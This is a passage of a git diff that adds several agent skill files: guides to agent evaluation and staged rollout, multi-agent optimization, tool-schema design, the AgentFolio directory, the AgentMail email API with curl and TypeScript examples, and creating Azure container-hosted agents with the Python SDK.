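    p_a, p_b = successes_a / n_a, successes_b / n_b
    pooled = (successes_a + successes_b) / (n_a + n_b)  # pooled proportion
    se = sqrt(pooled * (1 - pooled) * (1 / n_a + 1 / n_b))
    return (p_b - p_a) / se
```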
### 3.3 Evaluation Metrics

Comprehensive scoring framework:

**Task-Level Metrics:**

- Completion rate (binary success/failure)
- Correctness score (0-100% accuracy)
- Efficiency score (steps taken vs. optimal)
- Tool usage appropriateness
- Response relevance and completeness

**Quality Metrics:**

- Hallucination rate (factual errors per response)
- Consistency score (alignment with previous responses)
- Format compliance (matches specified structure)
- Safety score (constraint adherence)
- User satisfaction prediction

**Performance Metrics:**

- Response latency (time to first token)
- Total generation time
- Token consumption (input + output)
- Cost per task (API usage fees)
- Memory/context efficiency

### 3.4 Human Evaluation Protocol

Structured human review process:

- Blind evaluation (evaluators don't know the version)
- Standardized rubric with clear criteria
- Multiple evaluators per sample (inter-rater reliability)
- Qualitative feedback collection
- Preference ranking (A vs. B comparison)

## Phase 4: Version Control and Deployment

Safe rollout with monitoring and rollback capabilities.

### 4.1 Version Management

Systematic versioning strategy:

```
Version Format: agent-name-v[MAJOR].[MINOR].[PATCH]
Example: customer-support-v2.3.1

MAJOR: Significant capability changes
MINOR: Prompt improvements, new examples
PATCH: Bug fixes, minor adjustments
```

Maintain version history:

- Git-based prompt storage
- Changelog with improvement details
- Performance metrics per version
- Rollback procedures documented

### 4.2 Staged Rollout

Progressive deployment strategy:

1. **Alpha testing**: Internal team validation (5% traffic)
2. **Beta testing**: Selected users (20% traffic)
3. **Canary release**: Gradual increase (20% → 50% → 100%)
4. **Full deployment**: After success criteria are met
5. **Monitoring period**: 7-day observation window

### 4.3 Rollback Procedures

Quick recovery mechanism:

```
Rollback Triggers:
- Success rate drops >10% from baseline
- Critical errors increase >5%
- User complaints spike
- Cost per task increases >20%
- Safety violations detected

Rollback Process:
1. Detect issue via monitoring
2. Alert team immediately
3. Switch to previous stable version
4. Analyze root cause
5. Fix and re-test before retry
```
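The quantitative triggers above translate directly into a guard function; a sketch (the metric names are assumptions, and the user-complaint and safety triggers are omitted because they need their own data sources):

```python
def should_rollback(baseline: dict, current: dict) -> bool:
    """Return True if any quantitative rollback trigger fires."""
    return (
        current["success_rate"] < baseline["success_rate"] - 0.10   # >10% drop
        or current["error_rate"] > baseline["error_rate"] + 0.05    # >5% increase
        or current["cost_per_task"] > baseline["cost_per_task"] * 1.20  # >20% increase
    )
```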
### 4.4 Continuous Monitoring

Real-time performance tracking:

- Dashboard with key metrics
- Anomaly detection alerts
- User feedback collection
- Automated regression testing
- Weekly performance reports

## Success Criteria

Agent improvement is successful when:

- Task success rate improves by ≥15%
- User corrections decrease by ≥25%
- There is no increase in safety violations
- Response time remains within 10% of baseline
- Cost per task doesn't increase by >5%
- Positive user feedback increases

## Post-Deployment Review

After 30 days of production use:

1. Analyze accumulated performance data
2. Compare against baseline and targets
3. Identify new improvement opportunities
4. Document lessons learned
5. Plan the next optimization cycle

## Continuous Improvement Cycle

Establish a regular improvement cadence:

- **Weekly**: Monitor metrics and collect feedback
- **Monthly**: Analyze patterns and plan improvements
- **Quarterly**: Major version updates with new capabilities
- **Annually**: Strategic review and architecture updates

Remember: Agent optimization is an iterative process. Each cycle builds upon previous learnings, gradually improving performance while maintaining stability and safety.
@ -0,0 +1,242 @@
---
name: agent-orchestration-multi-agent-optimize
description: "Optimize multi-agent systems with coordinated profiling, workload distribution, and cost-aware orchestration. Use when improving agent performance, throughput, or reliability."
risk: unknown
source: community
date_added: "2026-02-27"
---

# Multi-Agent Optimization Toolkit

## Use this skill when

- Improving multi-agent coordination, throughput, or latency
- Profiling agent workflows to identify bottlenecks
- Designing orchestration strategies for complex workflows
- Optimizing cost, context usage, or tool efficiency

## Do not use this skill when

- You only need to tune a single agent prompt
- There are no measurable metrics or evaluation data
- The task is unrelated to multi-agent orchestration

## Instructions

1. Establish baseline metrics and target performance goals.
2. Profile agent workloads and identify coordination bottlenecks.
3. Apply orchestration changes and cost controls incrementally.
4. Validate improvements with repeatable tests and rollbacks.

## Safety

- Avoid deploying orchestration changes without regression testing.
- Roll out changes gradually to prevent system-wide regressions.

## Role: AI-Powered Multi-Agent Performance Engineering Specialist

### Context

The Multi-Agent Optimization Tool is an advanced AI-driven framework designed to holistically improve system performance through intelligent, coordinated agent-based optimization. Leveraging cutting-edge AI orchestration techniques, this tool provides a comprehensive approach to performance engineering across multiple domains.

### Core Capabilities

- Intelligent multi-agent coordination
- Performance profiling and bottleneck identification
- Adaptive optimization strategies
- Cross-domain performance optimization
- Cost and efficiency tracking

## Arguments Handling

The tool processes optimization arguments with flexible input parameters:

- `$TARGET`: Primary system/application to optimize
- `$PERFORMANCE_GOALS`: Specific performance metrics and objectives
- `$OPTIMIZATION_SCOPE`: Depth of optimization (quick-win, comprehensive)
- `$BUDGET_CONSTRAINTS`: Cost and resource limitations
- `$QUALITY_METRICS`: Performance quality thresholds

## 1. Multi-Agent Performance Profiling

### Profiling Strategy

- Distributed performance monitoring across system layers
- Real-time metrics collection and analysis
- Continuous performance signature tracking

#### Profiling Agents

1. **Database Performance Agent**
   - Query execution time analysis
   - Index utilization tracking
   - Resource consumption monitoring

2. **Application Performance Agent**
   - CPU and memory profiling
   - Algorithmic complexity assessment
   - Concurrency and async operation analysis

3. **Frontend Performance Agent**
   - Rendering performance metrics
   - Network request optimization
   - Core Web Vitals monitoring

### Profiling Code Example

```python
# Illustrative sketch: the agent classes and the aggregation helper
# are assumed to be defined elsewhere in the toolkit.
def multi_agent_profiler(target_system):
    agents = [
        DatabasePerformanceAgent(target_system),
        ApplicationPerformanceAgent(target_system),
        FrontendPerformanceAgent(target_system),
    ]

    performance_profile = {}
    for agent in agents:
        performance_profile[agent.__class__.__name__] = agent.profile()

    return aggregate_performance_metrics(performance_profile)
```

## 2. Context Window Optimization

### Optimization Techniques

- Intelligent context compression
- Semantic relevance filtering
- Dynamic context window resizing
- Token budget management

### Context Compression Algorithm

```python
def compress_context(context, max_tokens=4000):
    # Semantic compression using embedding-based truncation.
    # `semantic_truncate` is an assumed helper that drops the
    # least-important spans until the token budget is met.
    compressed_context = semantic_truncate(
        context,
        max_tokens=max_tokens,
        importance_threshold=0.7,
    )
    return compressed_context
```

## 3. Agent Coordination Efficiency

### Coordination Principles

- Parallel execution design
- Minimal inter-agent communication overhead
- Dynamic workload distribution
- Fault-tolerant agent interactions

### Orchestration Framework

```python
import concurrent.futures
from queue import PriorityQueue


class MultiAgentOrchestrator:
    def __init__(self, agents):
        self.agents = agents
        self.execution_queue = PriorityQueue()
        self.performance_tracker = PerformanceTracker()  # assumed helper

    def optimize(self, target_system):
        # Parallel agent execution with coordinated optimization
        with concurrent.futures.ThreadPoolExecutor() as executor:
            futures = {
                executor.submit(agent.optimize, target_system): agent
                for agent in self.agents
            }

            for future in concurrent.futures.as_completed(futures):
                agent = futures[future]
                result = future.result()
                self.performance_tracker.log(agent, result)
```

## 4. Parallel Execution Optimization

### Key Strategies

- Asynchronous agent processing
- Workload partitioning
- Dynamic resource allocation
- Minimal blocking operations

## 5. Cost Optimization Strategies

### LLM Cost Management

- Token usage tracking
- Adaptive model selection
- Caching and result reuse
- Efficient prompt engineering

### Cost Tracking Example

```python
class CostOptimizer:
    def __init__(self):
        self.token_budget = 100000  # Monthly budget
        self.token_usage = 0
        self.model_costs = {
            'gpt-5': 0.03,
            'claude-4-sonnet': 0.015,
            'claude-4-haiku': 0.0025,
        }

    def select_optimal_model(self, complexity):
        # Dynamic model selection based on task complexity (0.0-1.0):
        # route hard tasks to capable models, easy ones to cheap models.
        if complexity > 0.8:
            return 'gpt-5'
        if complexity > 0.4:
            return 'claude-4-sonnet'
        return 'claude-4-haiku'
```

## 6. Latency Reduction Techniques

### Performance Acceleration

- Predictive caching
- Pre-warming agent contexts
- Intelligent result memoization
- Reduced round-trip communication

## 7. Quality vs Speed Tradeoffs

### Optimization Spectrum

- Performance thresholds
- Acceptable degradation margins
- Quality-aware optimization
- Intelligent compromise selection

## 8. Monitoring and Continuous Improvement

### Observability Framework

- Real-time performance dashboards
- Automated optimization feedback loops
- Machine learning-driven improvement
- Adaptive optimization strategies

## Reference Workflows

### Workflow 1: E-Commerce Platform Optimization

1. Initial performance profiling
2. Agent-based optimization
3. Cost and performance tracking
4. Continuous improvement cycle

### Workflow 2: Enterprise API Performance Enhancement

1. Comprehensive system analysis
2. Multi-layered agent optimization
3. Iterative performance refinement
4. Cost-efficient scaling strategy

## Key Considerations

- Always measure before and after optimization
- Maintain system stability during optimization
- Balance performance gains with resource consumption
- Implement gradual, reversible changes

Target Optimization: $ARGUMENTS
58
packages/llm/skills/agent-tool-builder/SKILL.md
Normal file
@ -0,0 +1,58 @@
---
name: agent-tool-builder
description: "Tools are how AI agents interact with the world. A well-designed tool is the difference between an agent that works and one that hallucinates, fails silently, or costs 10x more tokens than necessar..."
risk: unknown
source: "vibeship-spawner-skills (Apache 2.0)"
date_added: "2026-02-27"
---

# Agent Tool Builder

You are an expert in the interface between LLMs and the outside world.
You've seen tools that work beautifully and tools that cause agents to
hallucinate, loop, or fail silently. The difference is almost always
in the design, not the implementation.

Your core insight: The LLM never sees your code. It only sees the schema
and description. A perfectly implemented tool with a vague description
will fail. A simple tool with crystal-clear documentation will succeed.

You push for explicit error handling.

## Capabilities

- agent-tools
- function-calling
- tool-schema-design
- mcp-tools
- tool-validation
- tool-error-handling

## Patterns

### Tool Schema Design

Creating clear, unambiguous JSON Schema for tools

### Tool with Input Examples

Using examples to guide LLM tool usage

### Tool Error Handling

Returning errors that help the LLM recover
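A sketch of the schema-design pattern above: explicit types, enums to remove ambiguity, and a concrete example baked into the description. The tool name and fields are hypothetical; the layout follows common function-calling conventions.

```python
# Hypothetical tool definition illustrating the schema-design pattern.
search_orders_tool = {
    "name": "search_orders",
    "description": (
        "Search customer orders by status. "
        "Example: search_orders(status='shipped', limit=10). "
        "Returns an empty list (not an error) when nothing matches."
    ),
    "input_schema": {
        "type": "object",
        "properties": {
            "status": {
                "type": "string",
                "enum": ["pending", "shipped", "delivered"],
                "description": "Order status to filter by.",
            },
            "limit": {
                "type": "integer",
                "minimum": 1,
                "maximum": 100,
                "description": "Maximum number of orders to return.",
            },
        },
        "required": ["status"],
    },
}
```

The enum and the in-description example are what keep the LLM from guessing free-form status strings or inventing parameters.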
## Anti-Patterns

### ❌ Vague Descriptions

### ❌ Silent Failures

### ❌ Too Many Tools

## Related Skills

Works well with: `multi-agent-orchestration`, `api-designer`, `llm-architect`, `backend`

## When to Use

Use this skill to execute the workflow or actions described in the overview.
97
packages/llm/skills/agentfolio/SKILL.md
Normal file
@ -0,0 +1,97 @@
---
name: agentfolio
description: "Skill for discovering and researching autonomous AI agents, tools, and ecosystems using the AgentFolio directory."
risk: unknown
source: agentfolio.io
date_added: "2026-02-27"
---

# AgentFolio

**Role**: Autonomous Agent Discovery Guide

Use this skill when you want to **discover, compare, and research autonomous AI agents** across ecosystems.
AgentFolio is a curated directory at https://agentfolio.io that tracks agent frameworks, products, and tools.

This skill helps you:

- Find existing agents before building your own from scratch.
- Map the landscape of agent frameworks and hosted products.
- Collect concrete examples and benchmarks for agent capabilities.

## Capabilities

- Discover autonomous AI agents, frameworks, and tools by use case.
- Compare agents by capabilities, target users, and integration surfaces.
- Identify gaps in the market or inspiration for new skills/workflows.
- Gather example agent behavior and UX patterns for your own designs.
- Track emerging trends in agent architectures and deployments.

## How to Use AgentFolio

1. **Open the directory**
   - Visit `https://agentfolio.io` in your browser.
   - Optionally filter by category (e.g., Dev Tools, Ops, Marketing, Productivity).

2. **Search by intent**
   - Start from the problem you want to solve:
     - “customer support agents”
     - “autonomous coding agents”
     - “research / analysis agents”
   - Use keywords in the AgentFolio search bar that match your domain or workflow.

3. **Evaluate candidates**
   - For each interesting agent, capture:
     - **Core promise** (what outcome it automates).
     - **Input / output shape** (APIs, UI, data sources).
     - **Autonomy model** (one-shot, multi-step, tool-using, human-in-the-loop).
     - **Deployment model** (SaaS, self-hosted, browser, IDE, etc.).

4. **Synthesize insights**
   - Use findings to:
     - Decide whether to integrate an existing agent vs. build your own.
     - Borrow successful UX and safety patterns.
     - Position your own agent skills and workflows relative to the ecosystem.

## Example Workflows

### 1) Landscape scan before building a new agent

- Define the problem: “autonomous test failure triage for CI pipelines”.
- Use AgentFolio to search for:
  - “testing agent”, “CI agent”, “DevOps assistant”, “incident triage”.
- For each relevant agent:
  - Note supported platforms (GitHub, GitLab, Jenkins, etc.).
  - Capture how they explain autonomy and safety boundaries.
  - Record pricing/licensing constraints if you plan to adopt instead of build.

### 2) Competitive and inspiration research for a new skill

- If you plan to add a new skill (e.g., observability agent, security agent):
  - Use AgentFolio to find similar agents and features.
  - Extract 3–5 concrete patterns you want to emulate or avoid.
  - Translate those patterns into clear requirements for your own skill.

### 3) Vendor shortlisting

- When choosing between multiple agent vendors:
  - Use AgentFolio entries as a neutral directory.
  - Build a comparison table (columns: capabilities, integrations, pricing, trust & security).
  - Use that table to drive a more formal evaluation or proof-of-concept.

## Example Prompts

Use these prompts when working with this skill in an AI coding agent:

- “Use AgentFolio to find 3 autonomous AI agents focused on code review. For each, summarize the core value prop, supported languages, and how they integrate into developer workflows.”
- “Scan AgentFolio for agents that help with customer support triage. List the top options, their target customer size (SMB vs. enterprise), and any notable UX patterns.”
- “Before we build our own research assistant, use AgentFolio to map existing research / analysis agents and highlight gaps we could fill.”

## When to Use

This skill is applicable when you need to **discover or compare autonomous AI agents** instead of building in a vacuum:

- At the start of a new agent or workflow project.
- When evaluating vendors or tools to integrate.
- When you want inspiration or best practices from existing agent products.
247
packages/llm/skills/agentmail/SKILL.md
Normal file
@ -0,0 +1,247 @@
---
name: agentmail
description: Email infrastructure for AI agents. Create accounts, send/receive emails, manage webhooks, and check karma balance via the AgentMail API.
risk: safe
source: community
---

# AgentMail — Email for AI Agents

AgentMail gives AI agents real email addresses (`@theagentmail.net`) with a REST API. Agents can send and receive email, sign up for services (GitHub, AWS, Slack, etc.), and get verification codes. A karma system prevents spam and keeps the shared domain's reputation high.

Base URL: `https://api.theagentmail.net`

## Quick start

All requests require an `Authorization: Bearer am_...` header (API key from the dashboard).

### Create an email account (-10 karma)

```bash
curl -X POST https://api.theagentmail.net/v1/accounts \
  -H "Authorization: Bearer am_..." \
  -H "Content-Type: application/json" \
  -d '{"address": "my-agent@theagentmail.net"}'
```

Response: `{"data": {"id": "...", "address": "my-agent@theagentmail.net", "displayName": null, "createdAt": 123}}`

### Send email (-1 karma)

```bash
curl -X POST https://api.theagentmail.net/v1/accounts/{accountId}/messages \
  -H "Authorization: Bearer am_..." \
  -H "Content-Type: application/json" \
  -d '{
    "to": ["recipient@example.com"],
    "subject": "Hello from my agent",
    "text": "Plain text body",
    "html": "<p>Optional HTML body</p>"
  }'
```

Optional fields: `cc`, `bcc` (string arrays), `inReplyTo`, `references` (strings for threading), `attachments` (array of `{filename, contentType, content}` where `content` is base64).

### Read inbox

```bash
# List messages
curl https://api.theagentmail.net/v1/accounts/{accountId}/messages \
  -H "Authorization: Bearer am_..."

# Get full message (with body and attachments)
curl https://api.theagentmail.net/v1/accounts/{accountId}/messages/{messageId} \
  -H "Authorization: Bearer am_..."
```

### Check karma

```bash
curl https://api.theagentmail.net/v1/karma \
  -H "Authorization: Bearer am_..."
```

Response: `{"data": {"balance": 90, "events": [...]}}`

### Register webhook (real-time inbound)

```bash
curl -X POST https://api.theagentmail.net/v1/accounts/{accountId}/webhooks \
  -H "Authorization: Bearer am_..." \
  -H "Content-Type: application/json" \
  -d '{"url": "https://my-agent.example.com/inbox"}'
```

Webhook deliveries include two security headers:

- `X-AgentMail-Signature` -- HMAC-SHA256 hex digest of the request body, signed with the webhook secret
- `X-AgentMail-Timestamp` -- millisecond timestamp of when the delivery was sent

Verify the signature and reject requests with timestamps older than 5 minutes to prevent replay attacks:

```typescript
import { createHmac } from "crypto";

const verifyWebhook = (body: string, signature: string, timestamp: string, secret: string) => {
  if (Date.now() - Number(timestamp) > 5 * 60 * 1000) return false;
  return createHmac("sha256", secret).update(body).digest("hex") === signature;
};
```

### Download attachment

```bash
curl https://api.theagentmail.net/v1/accounts/{accountId}/messages/{messageId}/attachments/{attachmentId} \
  -H "Authorization: Bearer am_..."
```

Returns `{"data": {"url": "https://signed-download-url..."}}`.

## Full API reference

| Method | Path | Description | Karma |
|--------|------|-------------|-------|
| POST | `/v1/accounts` | Create email account | -10 |
| GET | `/v1/accounts` | List all accounts | |
| GET | `/v1/accounts/:id` | Get account details | |
| DELETE | `/v1/accounts/:id` | Delete account | +10 |
| POST | `/v1/accounts/:id/messages` | Send email | -1 |
| GET | `/v1/accounts/:id/messages` | List messages | |
| GET | `/v1/accounts/:id/messages/:msgId` | Get full message | |
| GET | `/v1/accounts/:id/messages/:msgId/attachments/:attId` | Get attachment URL | |
| POST | `/v1/accounts/:id/webhooks` | Register webhook | |
| GET | `/v1/accounts/:id/webhooks` | List webhooks | |
| DELETE | `/v1/accounts/:id/webhooks/:whId` | Delete webhook | |
| GET | `/v1/karma` | Get balance + events | |

## Karma system

Every action has a karma cost or reward:

| Event | Karma | Why |
|---|---|---|
| `money_paid` | +100 | Purchase credits |
| `email_received` | +2 | Someone replied from a trusted domain |
| `account_deleted` | +10 | Karma refunded when you delete an address |
| `email_sent` | -1 | Sending costs karma |
| `account_created` | -10 | Creating addresses costs karma |

**Important rules:**

- Karma is only awarded for inbound emails from trusted providers (Gmail, Outlook, Yahoo, iCloud, ProtonMail, Fastmail, Hey, etc.). Emails from unknown/throwaway domains don't earn karma.
- You only earn karma once per sender until the agent replies. If sender X emails you 5 times without a reply, only the first earns karma. Reply to X, and the next email from X earns karma again.
- Deleting an account refunds the 10 karma it cost to create.

When karma reaches 0, sends and account creation return HTTP 402. Always check balance before operations that cost karma.
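A pre-flight affordability check keeps the agent from hitting 402 mid-task. A minimal TypeScript sketch (the `KARMA_COST` map and `canAfford` helper are illustrative, not part of the API or SDK; the costs mirror the table above):

```typescript
// Karma costs mirrored from the table above (keep in sync with the API).
const KARMA_COST = { send: 1, createAccount: 10 } as const;

// Decide whether an action is affordable before calling the API, so the
// agent can top up or skip the action instead of failing with HTTP 402.
function canAfford(balance: number, action: keyof typeof KARMA_COST): boolean {
  return balance >= KARMA_COST[action];
}

console.log(canAfford(90, "send"));          // true: 90 >= 1
console.log(canAfford(5, "createAccount"));  // false: 5 < 10
```

In practice, fetch the live balance from `GET /v1/karma` first and re-check after any failed request.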
## TypeScript SDK

```typescript
import { createClient } from "@agentmail/sdk";

const mail = createClient({ apiKey: "am_..." });

// Create account
const account = await mail.accounts.create({
  address: "my-agent@theagentmail.net",
});

// Send email
await mail.messages.send(account.id, {
  to: ["human@example.com"],
  subject: "Hello",
  text: "Sent by an AI agent.",
});

// Read inbox
const messages = await mail.messages.list(account.id);
const detail = await mail.messages.get(account.id, messages[0].id);

// Attachments
const att = await mail.attachments.getUrl(accountId, messageId, attachmentId);
// att.url is a signed download URL

// Webhooks
await mail.webhooks.create(account.id, {
  url: "https://my-agent.example.com/inbox",
});

// Karma
const karma = await mail.karma.getBalance();
console.log(karma.balance);
```

## Error handling

```typescript
import { AgentMailError } from "@agentmail/sdk";

try {
  await mail.messages.send(accountId, { to: ["a@b.com"], subject: "Hi", text: "Hey" });
} catch (e) {
  if (e instanceof AgentMailError) {
    console.log(e.status);   // 402, 404, 401, etc.
    console.log(e.code);     // "INSUFFICIENT_KARMA", "NOT_FOUND", etc.
    console.log(e.message);
  }
}
```

## Common patterns

### Sign up for a service and read verification email

```typescript
const account = await mail.accounts.create({
  address: "signup-bot@theagentmail.net",
});

// Use the address to sign up (browser automation, API, etc.)

// Poll for verification email
for (let i = 0; i < 30; i++) {
  const messages = await mail.messages.list(account.id);
  const verification = messages.find(m =>
    m.subject.toLowerCase().includes("verify") ||
    m.subject.toLowerCase().includes("confirm")
  );
  if (verification) {
    const detail = await mail.messages.get(account.id, verification.id);
    // Parse verification link/code from detail.bodyText or detail.bodyHtml
    break;
  }
  await new Promise(r => setTimeout(r, 2000));
}
```

### Send email and wait for reply

```typescript
const sent = await mail.messages.send(account.id, {
  to: ["human@company.com"],
  subject: "Question about order #12345",
  text: "Can you check the status?",
});

for (let i = 0; i < 60; i++) {
  const messages = await mail.messages.list(account.id);
  const reply = messages.find(m =>
    m.direction === "inbound" && m.timestamp > sent.timestamp
  );
  if (reply) {
    const detail = await mail.messages.get(account.id, reply.id);
    // Process reply
    break;
  }
  await new Promise(r => setTimeout(r, 5000));
}
```

## Types

```typescript
type Account = { id: string; address: string; displayName: string | null; createdAt: number };
type Message = { id: string; from: string; to: string[]; subject: string; direction: "inbound" | "outbound"; status: string; timestamp: number };
type MessageDetail = Message & { cc: string[] | null; bcc: string[] | null; bodyText: string | null; bodyHtml: string | null; inReplyTo: string | null; references: string | null; attachments: AttachmentMeta[] };
type AttachmentMeta = { id: string; filename: string; contentType: string; size: number };
type KarmaBalance = { balance: number; events: KarmaEvent[] };
type KarmaEvent = { id: string; type: string; amount: number; timestamp: number; metadata?: Record<string, unknown> };
```
326
packages/llm/skills/agents-v2-py/SKILL.md
Normal file
@ -0,0 +1,326 @@
---
name: agents-v2-py
description: "Build container-based Foundry Agents with Azure AI Projects SDK (ImageBasedHostedAgentDefinition). Use when creating hosted agents with custom container images in Azure AI Foundry."
risk: unknown
source: community
date_added: "2026-02-27"
---

# Azure AI Hosted Agents (Python)

Build container-based hosted agents using `ImageBasedHostedAgentDefinition` from the Azure AI Projects SDK.

## Installation

```bash
pip install "azure-ai-projects>=2.0.0b3" azure-identity
```

(The quotes matter: an unquoted `>=` is interpreted as shell redirection.)

**Minimum SDK Version:** `2.0.0b3` or later is required for hosted agent support.

## Environment Variables

```bash
AZURE_AI_PROJECT_ENDPOINT=https://<resource>.services.ai.azure.com/api/projects/<project>
```

## Prerequisites

Before creating hosted agents:

1. **Container Image** - Build and push to Azure Container Registry (ACR)
2. **ACR Pull Permissions** - Grant your project's managed identity the `AcrPull` role on the ACR
3. **Capability Host** - Account-level capability host with `enablePublicHostingEnvironment=true`
4. **SDK Version** - Ensure `azure-ai-projects>=2.0.0b3`

## Authentication

Always use `DefaultAzureCredential`:

```python
import os

from azure.identity import DefaultAzureCredential
from azure.ai.projects import AIProjectClient

credential = DefaultAzureCredential()
client = AIProjectClient(
    endpoint=os.environ["AZURE_AI_PROJECT_ENDPOINT"],
    credential=credential
)
```

## Core Workflow

### 1. Imports

```python
import os
from azure.identity import DefaultAzureCredential
from azure.ai.projects import AIProjectClient
from azure.ai.projects.models import (
    ImageBasedHostedAgentDefinition,
    ProtocolVersionRecord,
    AgentProtocol,
)
```

### 2. Create Hosted Agent

```python
client = AIProjectClient(
    endpoint=os.environ["AZURE_AI_PROJECT_ENDPOINT"],
    credential=DefaultAzureCredential()
)

agent = client.agents.create_version(
    agent_name="my-hosted-agent",
    definition=ImageBasedHostedAgentDefinition(
        container_protocol_versions=[
            ProtocolVersionRecord(protocol=AgentProtocol.RESPONSES, version="v1")
        ],
        cpu="1",
        memory="2Gi",
        image="myregistry.azurecr.io/my-agent:latest",
        tools=[{"type": "code_interpreter"}],
        environment_variables={
            "AZURE_AI_PROJECT_ENDPOINT": os.environ["AZURE_AI_PROJECT_ENDPOINT"],
            "MODEL_NAME": "gpt-4o-mini"
        }
    )
)

print(f"Created agent: {agent.name} (version: {agent.version})")
```

### 3. List Agent Versions

```python
versions = client.agents.list_versions(agent_name="my-hosted-agent")
for version in versions:
    print(f"Version: {version.version}, State: {version.state}")
```

### 4. Delete Agent Version

```python
client.agents.delete_version(
    agent_name="my-hosted-agent",
    version=agent.version
)
```

## ImageBasedHostedAgentDefinition Parameters

| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `container_protocol_versions` | `list[ProtocolVersionRecord]` | Yes | Protocol versions the agent supports |
| `image` | `str` | Yes | Full container image path (registry/image:tag) |
| `cpu` | `str` | No | CPU allocation (e.g., "1", "2") |
| `memory` | `str` | No | Memory allocation (e.g., "2Gi", "4Gi") |
| `tools` | `list[dict]` | No | Tools available to the agent |
| `environment_variables` | `dict[str, str]` | No | Environment variables for the container |

## Protocol Versions

The `container_protocol_versions` parameter specifies which protocols your agent supports:

```python
from azure.ai.projects.models import ProtocolVersionRecord, AgentProtocol

# RESPONSES protocol - standard agent responses
container_protocol_versions=[
    ProtocolVersionRecord(protocol=AgentProtocol.RESPONSES, version="v1")
]
```

**Available Protocols:**

| Protocol | Description |
|----------|-------------|
| `AgentProtocol.RESPONSES` | Standard response protocol for agent interactions |

## Resource Allocation

Specify CPU and memory for your container:

```python
definition=ImageBasedHostedAgentDefinition(
    container_protocol_versions=[...],
    image="myregistry.azurecr.io/my-agent:latest",
    cpu="2",       # 2 CPU cores
    memory="4Gi"   # 4 GiB memory
)
```

**Resource Limits:**

| Resource | Min | Max | Default |
|----------|-----|-----|---------|
| CPU | 0.5 | 4 | 1 |
| Memory | 1Gi | 8Gi | 2Gi |
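These limits can be checked client-side before calling `create_version`, so an out-of-range request fails fast with a clear message. A minimal sketch (the bounds are copied from the table above and the `validate_resources` helper is illustrative, not part of the SDK):

```python
# Bounds mirrored from the Resource Limits table above (not enforced by the SDK client).
CPU_RANGE = (0.5, 4.0)        # cores
MEMORY_RANGE_GI = (1.0, 8.0)  # GiB


def validate_resources(cpu: str, memory: str) -> bool:
    """Return True if cpu (e.g. "2") and memory (e.g. "4Gi") are within the limits."""
    cores = float(cpu)
    if not memory.endswith("Gi"):
        raise ValueError("memory must be given in Gi, e.g. '2Gi'")
    gib = float(memory[:-2])
    return CPU_RANGE[0] <= cores <= CPU_RANGE[1] and MEMORY_RANGE_GI[0] <= gib <= MEMORY_RANGE_GI[1]


print(validate_resources("2", "4Gi"))  # True: both within range
print(validate_resources("8", "2Gi"))  # False: 8 cores exceeds the max of 4
```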
## Tools Configuration

Add tools to your hosted agent:

### Code Interpreter

```python
tools=[{"type": "code_interpreter"}]
```

### MCP Tools

```python
tools=[
    {"type": "code_interpreter"},
    {
        "type": "mcp",
        "server_label": "my-mcp-server",
        "server_url": "https://my-mcp-server.example.com"
    }
]
```

### Multiple Tools

```python
tools=[
    {"type": "code_interpreter"},
    {"type": "file_search"},
    {
        "type": "mcp",
        "server_label": "custom-tool",
        "server_url": "https://custom-tool.example.com"
    }
]
```

## Container Environment Variables

Pass configuration to your container:

```python
environment_variables={
    "AZURE_AI_PROJECT_ENDPOINT": os.environ["AZURE_AI_PROJECT_ENDPOINT"],
    "MODEL_NAME": "gpt-4o-mini",
    "LOG_LEVEL": "INFO",
    "CUSTOM_CONFIG": "value"
}
```

**Best Practice:** Never hardcode secrets. Use environment variables or Azure Key Vault.

## Complete Example

```python
import os
from azure.identity import DefaultAzureCredential
from azure.ai.projects import AIProjectClient
from azure.ai.projects.models import (
    ImageBasedHostedAgentDefinition,
    ProtocolVersionRecord,
    AgentProtocol,
)


def create_hosted_agent():
    """Create a hosted agent with a custom container image."""

    client = AIProjectClient(
        endpoint=os.environ["AZURE_AI_PROJECT_ENDPOINT"],
        credential=DefaultAzureCredential()
    )

    agent = client.agents.create_version(
        agent_name="data-processor-agent",
        definition=ImageBasedHostedAgentDefinition(
            container_protocol_versions=[
                ProtocolVersionRecord(
                    protocol=AgentProtocol.RESPONSES,
                    version="v1"
                )
            ],
            image="myregistry.azurecr.io/data-processor:v1.0",
            cpu="2",
            memory="4Gi",
            tools=[
                {"type": "code_interpreter"},
                {"type": "file_search"}
            ],
            environment_variables={
                "AZURE_AI_PROJECT_ENDPOINT": os.environ["AZURE_AI_PROJECT_ENDPOINT"],
                "MODEL_NAME": "gpt-4o-mini",
                "MAX_RETRIES": "3"
            }
        )
    )

    print(f"Created hosted agent: {agent.name}")
    print(f"Version: {agent.version}")
    print(f"State: {agent.state}")

    return agent


if __name__ == "__main__":
    create_hosted_agent()
```

## Async Pattern

```python
import os
from azure.identity.aio import DefaultAzureCredential
from azure.ai.projects.aio import AIProjectClient
from azure.ai.projects.models import (
    ImageBasedHostedAgentDefinition,
    ProtocolVersionRecord,
    AgentProtocol,
)


async def create_hosted_agent_async():
    """Create a hosted agent asynchronously."""

    async with DefaultAzureCredential() as credential:
        async with AIProjectClient(
            endpoint=os.environ["AZURE_AI_PROJECT_ENDPOINT"],
            credential=credential
        ) as client:
            agent = await client.agents.create_version(
                agent_name="async-agent",
                definition=ImageBasedHostedAgentDefinition(
                    container_protocol_versions=[
                        ProtocolVersionRecord(
                            protocol=AgentProtocol.RESPONSES,
                            version="v1"
                        )
                    ],
                    image="myregistry.azurecr.io/async-agent:latest",
                    cpu="1",
                    memory="2Gi"
                )
            )
            return agent
```

## Common Errors

| Error | Cause | Solution |
|-------|-------|----------|
| `ImagePullBackOff` | ACR pull permission denied | Grant the `AcrPull` role to the project's managed identity |
| `InvalidContainerImage` | Image not found | Verify the image path and tag exist in ACR |
| `CapabilityHostNotFound` | No capability host configured | Create an account-level capability host |
| `ProtocolVersionNotSupported` | Invalid protocol version | Use `AgentProtocol.RESPONSES` with version `"v1"` |

## Best Practices

1. **Version Your Images** - Use specific tags, not `latest`, in production
2. **Minimal Resources** - Start with minimum CPU/memory, scale up as needed
3. **Environment Variables** - Use for all configuration, never hardcode
4. **Error Handling** - Wrap agent creation in try/except blocks
5. **Cleanup** - Delete unused agent versions to free resources
## Reference Links

- [Azure AI Projects SDK](https://pypi.org/project/azure-ai-projects/)
- [Hosted Agents Documentation](https://learn.microsoft.com/azure/ai-services/agents/how-to/hosted-agents)
- [Azure Container Registry](https://learn.microsoft.com/azure/container-registry/)

## When to Use

Use this skill when creating or managing container-based hosted agents (`ImageBasedHostedAgentDefinition`) in Azure AI Foundry.
173
